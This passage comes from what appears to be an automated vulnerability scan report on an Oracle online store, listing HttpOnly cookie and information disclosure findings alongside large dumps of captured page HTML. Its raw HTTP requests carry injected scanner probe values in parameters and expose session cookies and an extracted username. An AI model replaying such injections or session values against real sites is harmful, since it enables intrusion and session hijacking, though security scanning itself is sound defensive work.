href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10145:1298447:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="3"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width="15%"> <!-- $Header: ibeCCtdItemLeftBins.jsp 120.2 2005/11/16 05:57:01 svijaykr ship $ --> </td> <!-- center column -------------------------------------------------------> <td&..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /OA_HTML/jtfdload.jsp

/OA_HTML/jtfdload.jsp CONFIRMED

https://oraclestore.oracle.com/OA_HTML/jtfdload.jsp?fileid=455388252&appName=IBE&GSI=xw7XzrhVDfQxPPT..

Identified Cookie

JSESSIONID

Request

GET /OA_HTML/jtfdload.jsp?fileid=455388252&appName=IBE&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5 HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/ibeCCtdMinisites.jsp?language=US&ref=http%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: BIGipServergsiap_store_http=1510838925.5150.0000; GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public
Pragma: public
Expires: Mon, 12 Sep 2011 17:56:22 GMT
Content-Disposition: attachment; filename="O_Store_clr_rgb.gif";
Content-Type: application/octet-stream
Set-Cookie: JSESSIONID=9190344b7375b88d40049a4917bdd6c6a75ebe11d0294cde7800c3c3d973e494.e34QbhaLa3mKbi0La3mQaNePax4Oe0; path=/OA_HTML; secure
Content-Length: 914
Date: Sun, 11 Sep 2011 17:56:22 GMT


MS Office Information Disclosure

MS Office Information Disclosure
2 TOTAL
LOW
Netsparker found HTML files that are produced by MS Office Suite. MS Office has appended user related information to the document.

Impact

This information can be used for social engineering attacks.

Remedy

Remove all sensitive information from your HTML documents.

Classification

PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
- /OA_HTML/ibeCCtpSctDspRte.jsp

/OA_HTML/ibeCCtpSctDspRte.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10381&sitex=%20netsparker(0x000B5..

Extracted Credential

sandhya

Request

GET /OA_HTML/ibeCCtpSctDspRte.jsp?section=10381&sitex=%20netsparker(0x000B59)%20 HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp?minisite=10145&respid=1298447&grp=STORE&language=US&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=7f96e59dfb8d0202586e8359774ee2fec06b8511a19aee1a07124bef3ce65a1c.e34QbhaLa3mKbi0La3mQaNePax4Ne0; GSI_pses=ZGD582E2A74CB97B71F2A5538B9890BC88A94C9E73DC1ACC639308E89D86F3F4A66BE46C7DBD8240CB53156689CE84EE68; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=Uvk889vlTzLRz5745Iov9VSZbt
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=7f96e59dfb8d0202586e8359774ee2fec06b8511a19aee1a07124bef3ce65a1c.e34Qb38Qax0Obi0La3mQaxaObxuPe0; path=/OA_HTML; secure
Transfer-Encoding: chunked
Date: Sun, 11 Sep 2011 17:58:48 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/ibeCCtdCmnSt.jsp






























<!-- $Header: ibeCCtdCmnSt.jsp 120.3.12010000.2 2009/03/02 06:30:51 amaheshw ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCWcpESIContainer.jsp 120.0 2005/05/30 03:10:04 appldev noship $ --><!-- $Header: ibeCWcpHeader.jsp 120.0 2005/05/30 02:24:25 appldev noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:How to Order </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZG8E866DF01E240A58D448F35C4A5F7FD192434310E23D899C&appName=IBE&sitex=14405:1435532:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------> <table summary='' border="0" width="100%" cellspacing="0" cellpadding="0"> <!-- left column ---------------------------------------------------------> <tr><td valign="top" width="15%" nowrap&..
- /OA_HTML/ibeCCtpBuyRoute.jsp

/OA_HTML/ibeCCtpBuyRoute.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCCtpBuyRoute.jsp

Extracted Credential

sandhya

Request

POST /OA_HTML/ibeCCtpBuyRoute.jsp HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10381&sitex=10145:1298447:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: oraclestore.oracle.com
Cookie: JSESSIONID=056dae5c6edba2c25a9819d3c41a65e5df10a7599e99f62afe8de771fc015c9c.e34QbhaLa3mKbi0La3mQaNePax4Ne0; GSI_pses=ZG1F188B8BC3642976C9D8FB17CF11FA2CF8530CDC00C87B8378523FA50BE00A841DCA9B6ABDDB9737248DF90BA1EB6672; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=d2URhSZwRW5aqH66f4ha07Vq0C
Content-Length: 119
Expect: 100-continue
Accept-Encoding: gzip, deflate

refpage=ibeCCtpSctDspRte.jsp%3fsection%3d10381%26beginIndex%3d0&num=0&tmpx=100&tmpy=*/netsparker(0x0013AB)%3B/*&event=3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=332a7b13d156786f2169b2f350547db55cc71573e0fc47d3a6fe603051a174ff.e34Qb38Qax0Obi0La3mQaxaObxuNe0; path=/OA_HTML; secure
Transfer-Encoding: chunked
Date: Sun, 11 Sep 2011 18:04:31 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/ibeCCtdCmnSt.jsp






























<!-- $Header: ibeCCtdCmnSt.jsp 120.3.12010000.2 2009/03/02 06:30:51 amaheshw ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCWcpESIContainer.jsp 120.0 2005/05/30 03:10:04 appldev noship $ --><!-- $Header: ibeCWcpHeader.jsp 120.0 2005/05/30 02:24:25 appldev noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:How to Order </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 